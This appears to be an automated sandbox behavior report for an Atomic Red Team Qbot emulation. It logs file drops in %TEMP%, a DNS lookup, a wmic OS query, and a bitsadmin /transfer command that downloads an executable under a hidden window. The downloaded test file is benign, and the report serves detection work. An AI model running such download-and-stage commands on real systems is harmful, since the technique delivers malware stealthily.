Technical Information
- '%TEMP%\atomic_qbot.exe'
- %TEMP%\bit6058.tmp
- from %TEMP%\bit6058.tmp to %TEMP%\atomic_qbot.exe
- 'ra#.####ubusercontent.com':443
- DNS ASK ra#.####ubusercontent.com
- '<SYSTEM32>\bitsadmin.exe' /transfer qcxjb26 /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello.exe %TEMP%\Atomic_Qbot.exe (with hidden window)
- '<SYSTEM32>\wbem\wmic.exe' OS get Caption /value
- '<SYSTEM32>\bitsadmin.exe' /transfer qcxjb26 /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello.exe %TEMP%\Atomic_Qbot.exe